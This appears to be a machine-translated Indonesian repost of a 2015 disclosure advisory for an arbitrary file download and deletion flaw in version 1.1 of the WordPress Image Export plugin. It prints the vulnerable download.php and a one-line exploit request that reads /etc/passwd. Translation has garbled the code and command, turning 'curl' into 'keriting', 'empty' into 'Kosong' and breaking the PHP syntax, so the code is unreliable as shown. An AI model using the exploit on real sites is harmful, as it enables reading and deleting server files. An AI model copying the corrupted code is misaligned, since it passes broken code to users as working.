Gambar WordPress Ekspor 1.1 Sewenang File Download

chmood

Judul: Remote download file kerentanan di Plugin WordPress gambar-ekspor v1.1
Penulis: Larry W. Cashdollar, @ _larry0
Tanggal: 2015/07/01
Download Site: https://wordpress.org/plugins/image-export
Vendor: www.1efthander.com
Vendor Diberitahu: 2015/07/05
Kontak Vendor: https://twitter.com/1eftHander
Keterangan: Plugin Ekspor Gambar dapat membantu Anda selektif men-download gambar yang diunggah oleh administrator.

Kerentanan:
Kode dalam file download.php tidak melakukan pengecekan bahwa pengguna meminta file dari direktori hanya gambar yang diupload. Dan garis 8 upaya untuk
tautan file setelah download. Script ini dapat digunakan untuk menghapus file dari direktori wordpress jika hak akses file memungkinkan.

1 <? Php
2 if (isset ($ _REQUEST ['file']) &&! Kosong ($ _REQUEST ['file'])) {
3 $ file = $ _GET ['file'];
4
5 header ('Content-Type: application / zip');
6 header ('Content-Disposition: attachment; filename = "" $ file..' "');
7 readfile ($ file);
8 unlink ($ file);
9
10 exit;
11}
12?>

CVEID: TBD
Exploit Code:
• $ keriting http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd
Layar Shots:
Penasehat: http://www.vapid.dhs.org/advisory.php?v=135


تعليقات
‏يستخدم هذا الموقع ملفات تعريف الارتباط من Google لتقديم الخدمات وتخصيص الإعلانات وتحليل عدد الزيارات. وتتم مشاركة المعلومات حول استخدامك لهذا الموقع مع Google. باستخدامك لهذا الموقع، فإنك توافق على استخدامه لملفات تعريف الارتباط.